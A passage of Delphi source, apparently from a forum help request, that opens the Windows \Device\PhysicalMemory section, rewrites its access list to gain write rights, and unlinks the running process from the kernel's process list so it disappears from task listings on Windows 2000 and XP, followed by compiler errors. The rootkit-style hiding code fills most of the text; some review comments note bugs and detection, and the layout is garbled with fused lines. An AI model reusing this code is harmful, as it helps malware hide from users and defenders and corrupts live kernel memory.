      end;  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
      OBJECT_ATTRIBUTES = record
        Length: DWORD;
        RootDirectory: Pointer;
        ObjectName: PUNICODE_STRING;
        Attributes: DWORD;
        SecurityDescriptor: Pointer;
        SecurityQualityOfService: Pointer;
      end;  TZwOpenSection = function(SectionHandle: PHandle;
        DesiredAccess: ACCESS_MASK;
        ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
      TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
        SourceString: PWideChar); stdcall;var
      RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
      ZwOpenSection: TZwOpenSection = nil;
      g_hNtDLL: THandle = 0;
      g_pMapPhysicalMemory: Pointer = nil;
      g_hMPM: THandle = 0;
      g_hMPM2: THandle = 0;
      g_osvi: OSVERSIONINFO;
      b_hide: Boolean = false;
    // InitNTDLL: loads ntdll.dll and resolves RtlInitUnicodeString and ZwOpenSection.
    // Returns False only when LoadLibrary fails; the GetProcAddress results are not checked.
    //---------------------------------------------------------------------------function InitNTDLL: Boolean;
    begin
      g_hNtDLL := LoadLibrary('ntdll.dll');  if 0=g_hNtDLL then
      begin
        Result:=false;
        Exit;
      end;  RtlInitUnicodeString:=GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
      ZwOpenSection:=GetProcAddress(g_hNtDLL, 'ZwOpenSection');  Result:=True;
    end;
    // CloseNTDLL: frees the module handle in g_hNtDLL when it is non-zero, then zeroes it.
    //---------------------------------------------------------------------------procedure CloseNTDLL;
    begin
      if (0 <> g_hNtDLL) then
        FreeLibrary(g_hNtDLL);
      g_hNtDLL := 0;
    end;
    // SetPhyscialMemorySectionCanBeWrited: adds an entry granting SECTION_MAP_WRITE to the
    // trustee 'CURRENT_USER' to the DACL of the section behind hSection
    // (GetSecurityInfo -> SetEntriesInAcl -> SetSecurityInfo).
    // NOTE(review): no failure branch exits, so each later call runs even if an earlier one
    // failed; buffers are freed only in the failure branches.
    // Defender note: this leaves a changed security descriptor on a kernel object.
    //---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
    var
      pDacl:PACL;
      pSD:PPSECURITY_DESCRIPTOR;
      pNewDacl:PACL;
      dwRes:DWORD;
      ea:EXPLICIT_ACCESS;
    begin
      pDacl:=nil;
      pSD:=nil;
      pNewDacl:=nil;  dwRes:=GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
      ea.grfAccessPermissions:=SECTION_MAP_WRITE;
      ea.grfAccessMode:=GRANT_ACCESS;
      ea.grfInheritance:=NO_INHERITANCE;
      ea.Trustee.TrusteeForm:=TRUSTEE_IS_NAME;
      ea.Trustee.TrusteeType:=TRUSTEE_IS_USER;
      ea.Trustee.ptstrName:='CURRENT_USER';  dwRes:=SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;  dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  if ERROR_SUCCESS <> dwRes then
      begin
        if Assigned(pSD) then
          LocalFree(Hlocal(pSD^));
        if Assigned(pNewDacl) then
          LocalFree(HLocal(pNewDacl));
      end;end;
    // OpenPhysicalMemory: opens the '\Device\PhysicalMemory' section read/write (changing
    // its DACL first when the open is denied) and maps one $1000-byte view at a hard-coded,
    // version-dependent offset into g_pMapPhysicalMemory.
    // Returns the section handle, or 0 for any OS other than version 5.0 / 5.1, a failed
    // open, or a failed mapping.
    // Defender note: Windows Server 2003 SP1 and later no longer allow user-mode code to
    // open this section.
    //---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
    var
      status:NTSTATUS;
      physmemString:UNICODE_STRING;
      attributes:OBJECT_ATTRIBUTES;
      PhyDirectory:DWORD;
    begin
      g_osvi.dwOSVersionInfoSize:=sizeof(OSVERSIONINFO);
      GetVersionEx(g_osvi);  if (5 <> g_osvi.dwMajorVersion) then
      begin
        Result:=0;
        Exit;
      end;  case g_osvi.dwMinorVersion of
        0: PhyDirectory := $30000;
        1: PhyDirectory := $39000;
      else
        begin
          Result:=0;
          Exit;
        end;
      end;  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');  attributes.Length:=SizeOf(OBJECT_ATTRIBUTES);
      attributes.RootDirectory:=nil;
      attributes.ObjectName:=@physmemString;
      attributes.Attributes:=0;
      attributes.SecurityDescriptor:=nil;
      attributes.SecurityQualityOfService:=nil;  status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then
      begin
        // Retry path: the status of this first reopen is not checked.
        ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);    status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
      end;  if not (LongInt(status) >= 0) then
      begin
        Result:=0;
        Exit;
      end;  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
        FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  if (g_pMapPhysicalMemory = nil) then
      begin
        Result:=0;
        Exit;
      end;  Result:=g_hMPM;
    end;
    //---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
    var
      VAddr,PGDE,PTE,PAddr,tmp:DWORD;
    begin
      VAddr:=DWORD(addr);
      PGDE:=PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.  if 0 = (PGDE and 1) then
      begin
        Result:=nil;
        Exit;
      end;
      

  12.   

    tmp := PGDE and $00000080;  if (0 <> tmp) then
      begin
        PAddr:=(PGDE and $FFC00000) + (VAddr and $003FFFFF);
      end
      else
      begin
        PGDE:=DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
        PTE:=PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.    if (0 = (PTE and 1)) then
        begin
          Result:=nil;
          Exit;
        end;    PAddr:=(PTE and $FFFFF000) + (VAddr and $00000FFF);
        UnmapViewOfFile(Pointer(PGDE));
      end;  Result:=Pointer(PAddr);
    end;
    // GetData: reads one DWORD at the virtual address addr via LinearToPhys and a temporary
    // one-page mapping of g_hMPM; the in-page offset is rounded down to a 4-byte boundary.
    // Returns the value read, or 0 when the page cannot be mapped.
    // NOTE(review): a nil (0) translation result is not checked before mapping.
    //---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
    var
      phys,ret:DWORD;
      tmp:PDWORD;
    begin
      phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
      tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
        phys and $FFFFF000, $1000));  if (nil=tmp) then
      begin
        Result:=0;
        Exit;
      end;//  ret:=tmp[(phys and $FFF) shr 2];
      ret:=PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
      UnmapViewOfFile(tmp);  Result:=ret;
    end;
    // SetData: writes the DWORD data at the virtual address addr via LinearToPhys and a
    // temporary one-page write mapping of g_hMPM; the in-page offset is rounded down to a
    // 4-byte boundary. Returns False when the page cannot be mapped, True after the store.
    // NOTE(review): a nil (0) translation result is not checked, so the store can land in
    // physical page 0.
    //---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
    var
      phys:DWORD;
      tmp:PDWORD;
    begin
      phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
      tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  if (nil = tmp) then
      begin
        Result:=false;
        Exit;
      end;//  tmp[(phys and $FFF) shr 2] := data;
      PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^:=data; // Modify by dot.
      UnmapViewOfFile(tmp);  Result := TRUE;
    end;
    //---------------------------------------------------------------------------
    {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
    begin
     ExitProcess(0);
     return 1 ;
    end }
    // YHideProcess: after InitNTDLL and OpenPhysicalMemory succeed, follows two hard-coded
    // pointers ($FFDFF124 "kteb", then +$44 "kpeb"), reads a forward/backward pointer pair
    // at an offset chosen by g_osvi.dwMinorVersion, and stores bw at fw+4 and fw at bw so
    // the neighbouring list entries skip this one. Returns True once the writes are issued.
    // NOTE(review): OpenPhysicalMemory in this post returns 0 for minor versions other than
    // 0 and 1, so the minor-version-2 branch is unreachable as written.
    // NOTE(review): only two list pointers are changed; an enumeration that does not use
    // this list still sees the process, which is what cross-view detection relies on.
    // NOTE(review): the writes hit live kernel data from user mode with no locking, and
    // neither GetData failures nor SetData results are checked.
    //---------------------------------------------------------------------------function YHideProcess:Boolean;
    var
      thread,process:DWORD;
      fw,bw:DWORD;
    begin
    //  SetUnhandledExceptionFilter(exeception);
      if (FALSE=InitNTDLL) then
      begin
        Result:=FALSE;
        Exit;
      end;  if (0 = OpenPhysicalMemory) then
      begin
        Result:=FALSE;
        Exit;
      end;  thread:=GetData(Pointer($FFDFF124)); //kteb
      process:=GetData(Pointer(thread + $44)); //kpeb  if (0 = g_osvi.dwMinorVersion) then       //win2000
      begin
        fw:=GetData(Pointer(process + $A0));
        bw:=GetData(Pointer(process + $A4));
        SetData(Pointer(fw + 4), bw);
        SetData(Pointer(bw), fw);
        Result:=TRUE;
      end
      else if (1 = g_osvi.dwMinorVersion) then   //winXP
      begin
        fw:=GetData(Pointer(process + $88));
        bw:=GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4),bw);
        SetData(Pointer(bw),fw);
        Result:=TRUE;
      end
      else if (2 = g_osvi.dwMinorVersion) then   //win2003
      begin
        fw:=GetData(Pointer(process + $8A));
        bw:=GetData(Pointer(process + $8E));    SetData(Pointer(fw + 4), bw);
        SetData(Pointer(bw), fw);
        Result:=TRUE;
      end
      else
      begin
        Result:=False;
      end;
      CloseHandle(g_hMPM);
      CloseNTDLL;
    // HideProcess: returns the cached b_hide, calling YHideProcess first while it is False.
    end;function HideProcess:Boolean;这句报错!
    begin
      if not b_hide then
      begin
        b_hide:=YHideProcess;
      end;
      Result:=b_hide;
    end;[Error] HideProcess.pas(356): Identifier redeclared: 'HideProcess'
    [Error] HideProcess.pas(366): Declaration expected but end of file found
    [Error] HideProcess.pas(5): Unsatisfied forward or external declaration: 'MyHideProcess'
    [Fatal Error] Unit1.pas(7): Could not compile used unit 'HideProcess.pas'